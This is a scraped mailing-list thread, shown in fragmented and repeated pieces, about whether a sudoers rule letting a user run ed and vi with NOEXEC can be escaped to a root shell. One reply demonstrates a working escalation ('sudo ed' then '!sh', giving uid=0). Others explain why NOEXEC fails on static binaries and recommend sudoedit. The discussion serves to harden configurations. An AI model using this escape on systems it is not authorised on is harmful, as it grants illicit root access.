On Tue, 28 Apr 2015 07:19:34 +0200, someone wrote:
> You are perfectly correct, it was ed, not vi and sudoedit could be the
> solution, thanks.
> I will try to search the internet how to do the LD_PRELOAD trick with ed.
You cannot as LD_PRELOAD only works with dynamic executables and
ed is static
You are perfectly correct, it was ed, not vi and sudoedit could be the
solution, thanks.
I will try to search the internet how to do the LD_PRELOAD trick with ed.
Thanks :)
On Tue, Apr 28, 2015 at 7:09 AM, Philip Guenther wrote:
> On Mon, Apr 27, 2015 at 9:43 PM, someone
> wrote:
> > "Yeah, th
On Mon, Apr 27, 2015 at 9:43 PM, someone wrote:
> "Yeah, that LD_PRELOAD trick NOEXEC uses doesn't work so well with
> static executables."
>
> Thank you, so there is a way tricking noexec with vi to get a root shell.
No, that's not what naddy demonstrated. He showed that NOEXEC didn't
work with
> "Yeah, that LD_PRELOAD trick NOEXEC uses doesn't work so well with
> static executables."
>
> Thank you, so there is a way tricking noexec with vi to get a root shell.
> But how exactly? Why isn't it fixed? :O
Oh something is broken?
Please show your work.
"Yeah, that LD_PRELOAD trick NOEXEC uses doesn't work so well with
static executables."
Thank you, so there is a way tricking noexec with vi to get a root shell.
But how exactly? Why isn't it fixed? :O
On Mon, Apr 27, 2015 at 9:49 PM, Christian Weisgerber
wrote:
> On 2015-04-27, "whynot sudo"
On 2015-04-27, "whynot sudo" wrote:
> Cmnd_Alias FOO = /bin/ed, /usr/bin/ed, /usr/bin/vi
> foouser LOCALHOST = NOPASSWD: NOEXEC: FOO
>
> Can the "foouser" escape to root prompt?
Let's try!
$ sudo ed
!sh
# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty),
5(operator), 20(sta
On Mon, Apr 27, 2015 at 1:44 PM, Richo Healey wrote:
> On 28/04/15 05:28 +1200, Carlin Bingham wrote:
>
>> On Tue, 28 Apr 2015, at 04:46 AM, whynot sudo wrote:
>>
>>> Hello list,
>>>
>>> We know it's safer* to use sudoedit, but what bad things can happen if we
>>> have the following in sudoers?
>
On 28/04/15 05:28 +1200, Carlin Bingham wrote:
On Tue, 28 Apr 2015, at 04:46 AM, whynot sudo wrote:
Hello list,
We know it's safer* to use sudoedit, but what bad things can happen if we
have the following in sudoers?
Cmnd_Alias FOO = /bin/ed, /usr/bin/ed, /usr/bin/vi
foouser LOCALHOST = NOPASS
On Tue, 28 Apr 2015, at 04:46 AM, whynot sudo wrote:
> Hello list,
>
> We know it's safer* to use sudoedit, but what bad things can happen if we
> have the following in sudoers?
>
> Cmnd_Alias FOO = /bin/ed, /usr/bin/ed, /usr/bin/vi
> foouser LOCALHOST = NOPASSWD: NOEXEC: FOO
>
> Can the "foous
"In the bad thing category, you could break your sudo config."
What do you mean by that?
Original Message
From: ludovic coues
To: whynot sudo
Subject: Re: What bad things could happen if we don't use sudoedit?
Date: Mon, 27 Apr 2015 18:52:56 +0200
> 20
Hello list,
We know it's safer* to use sudoedit, but what bad things can happen if we have
the following in sudoers?
Cmnd_Alias FOO = /bin/ed, /usr/bin/ed, /usr/bin/vi
foouser LOCALHOST = NOPASSWD: NOEXEC: FOO
Can the "foouser" escape to root prompt? - of course besides that he could now
edit
11 matches
Mail list logo